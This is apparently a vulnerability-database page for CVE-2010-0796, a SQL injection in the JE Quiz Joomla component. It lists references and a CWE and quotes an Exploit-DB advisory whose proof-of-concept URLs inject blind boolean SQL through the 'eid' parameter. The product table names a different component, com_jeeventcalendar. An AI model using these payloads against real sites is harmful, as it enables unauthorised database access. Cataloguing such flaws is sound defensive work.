CVE-2010-0796
Description
SQL injection vulnerability in the JE Quiz (com_jequizmanagement) component 1.b01 for Joomla! allows remote attackers to execute arbitrary SQL commands via the eid parameter in a question action to index.php.
Predictions
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Joomla! Component JE Quiz - 'eid' Blind SQL Injection
[~]>> ...[BEGIN ADVISORY]...
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
[~]>> TITLE: Joomla (JE Quiz component) BLIND SQL Injection Vulnerability
[~]>> LANGUAGE: PHP
[~]>> DORK: N/A
[~]>> RESEARCHER: B-HUNT3|2
[~]>> CONTACT: bhunt3r[at_no_spam]gmail[dot_no_spam]com
[~]>> TYPE: COMMERCIAL
[~]>> PRICE: $20.00
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
[~]>> DESCRIPTION: Input var eid is vulnerable to SQL Code Injection
[~]>> AFFECTED VERSIONS: Confirmed in 1.b01 but probably other versions also
[~]>> RISK: Medium/High
[~]>> IMPACT: Execute Arbitrary SQL queries
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
[~]>> PROOF OF CONCEPT:
[~]>> http://server/index.php?option=com_jequizmanagement&view=question&eid=[SQL]&Itemid=163
[~]>> {RETURN TRUE::RETURN FALSE}
[~]>> http://server/index.php?option=com_jequizmanagement&view=question&eid=1+AND+1=if(substring(@@version,1,1)=5,1,0)&Itemid=163
[~]>> http://server/index.php?option=com_jequizmanagement&view=question&eid=1+AND+1=if(substring(@@version,1,1)=4,1,0)&Itemid=163
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
[~]>> ...[END ADVISORY]...
Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| harmistechnology | com_jeeventcalendar | 1.0 | |
| joomla | joomla\! | | |
References
- http://osvdb.org/62039
- http://packetstormsecurity.org/1001-exploits/joomlajequiz-sql.txt
- http://secunia.com/advisories/38412
- http://www.exploit-db.com/exploits/11287
- http://www.securityfocus.com/bid/38032
- https://exchange.xforce.ibmcloud.com/vulnerabilities/56009
- http://osvdb.org/62039
- http://packetstormsecurity.org/1001-exploits/joomlajequiz-sql.txt
- http://secunia.com/advisories/38412
- http://www.exploit-db.com/exploits/11287
- http://www.securityfocus.com/bid/38032
- https://exchange.xforce.ibmcloud.com/vulnerabilities/56009
CWEs
CWE-89
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.